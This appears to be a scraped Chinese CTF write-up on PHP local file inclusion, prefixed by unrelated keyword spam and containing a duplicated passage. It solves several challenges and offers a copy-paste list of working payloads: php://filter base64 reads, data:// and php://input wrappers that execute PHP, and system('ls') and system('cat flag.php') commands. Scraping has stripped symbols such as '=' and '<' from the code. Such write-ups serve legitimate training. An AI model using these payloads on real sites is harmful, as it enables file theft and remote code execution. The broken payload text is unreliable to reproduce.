佛山新网站制作咨询,网站建设 类型,番禺核酸检测点查询,河南省建设厅网站154号文件上一篇文章#xff1a;一篇文章带你入门文件包含-CSDN博客
已经开始入门了文件包含#xff0c;那现在开始拔高提升刷题#xff01;
1.
拿到题目后啥也没有#xff0c;所以也不知道要读取啥文件#xff0c;那就查看源代码。 直接看if的条件就可以知道一定要设置cookie一篇文章带你入门文件包含-CSDN博客
已经开始入门了文件包含那现在开始拔高提升刷题
1.
拿到题目后啥也没有所以也不知道要读取啥文件那就查看源代码。 直接看if的条件就可以知道一定要设置cookie因为这里存在着文件包含
看来我上一篇文章的就知道直接伪协议开始读取
?filephp://filter/readconvert.base64-encode/resourcexxx.php
这个是基本的格式啊
这里因为要写入cookie而且首页还提示了网站首页目录 /var/www/html/index.php
那就稍作修改,抓包添加cookie并且写入 languagephp://filter/readconvert.base64-encode/resource/var/www/html/flag
2
WRONG WAY! ?php include(flag.php); highlight_file(__FILE__); if(isset($_GET[file1]) isset($_GET[file2])) { $file1 $_GET[file1]; $file2 $_GET[file2]; if(!empty($file1) !empty($file2)) { if(file_get_contents($file2) hello ctf) { include($file1); } } else die(NONONO); }
提示PHP file_get_contents () 函数
定义和用法 file_get_contents () 把整个文件读入一个字符串中。 该函数是用于把文件的内容读入到一个字符串中的首选方法。 如果服务器操作系统支持还会使用内存映射技术来增强性能。读了我上一篇文章的人拿到这道题目应该就可以直接出现思路了其实就是存在两个文件file1直接伪协议直接读取flag.php,没啥意思file2就是伪协议写入 hello ctf ?file1php://filter/readconvert.base64-encode/resourceflag.phpfile2data:text/plain,hello ctf这个payload在上一篇文章开头就有类似的需要可以自行复制 上一篇文章一篇文章带你入门文件包含-CSDN博客 然后再来一道永恒的经典 ?php show_source(__FILE__); echo $_GET[hello]; $page$_GET[page]; while (strstr($page, php://)) { $pagestr_replace(php://, , $page); } include($page); ?
这道题目有多种解法
二话不说先给大家献上干货以下是CTF伪协议的常见用法遇到直接自行复制使用即可
补充一下第一点的?php phpinfo()?如果找不到flag那也别傻站着换个命令?php system(ls)?或者直接?php system(cat flag.php)?
第二点的PD9waHAgcGhwaW5mbygpPz4base64形式的?php phpinfo()?如果这个不行也别傻站着换个命令你不知道对面会过滤什么唯有多尝试。
1.?filedata:text/plain,?php phpinfo()?
2.?filedata:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4
3.?filephp://input [POST DATA:]?php phpinfo()?
4.?filephp://filter/readconvert.base64-encode/resourcexxx.php
这里拿一道题目演示成果 ?filedata:text/plain,?php phpinfo()?直接丢进去就出现phpinfo如果ctrlf查找flag发现没有那也别傻站着换个命令。?php system(ls)? 最后直接?php system(cat fl4gisisish3r3.php)?直接拿下
以上只是基本思路因为看题目它过滤了php//也就是用不了php:input协议那就换成data://text/plain协议如果过滤的很严格那就可以尝试下文件日志包含以上只是提供了基本解题思路如果你第一种方法失效了就说明被过滤了后面还有很多方法别愣着如果不知道对面过滤了什么那就一个一个尝试。
以上只是其中微不足道的一种方法这里通过我的见解抛砖引玉。如果各位能够想出两种甚至三种方法做出这道题那么你就可以说自己已经离开了文件上传的新手村了
祝大家CTF玩的开心
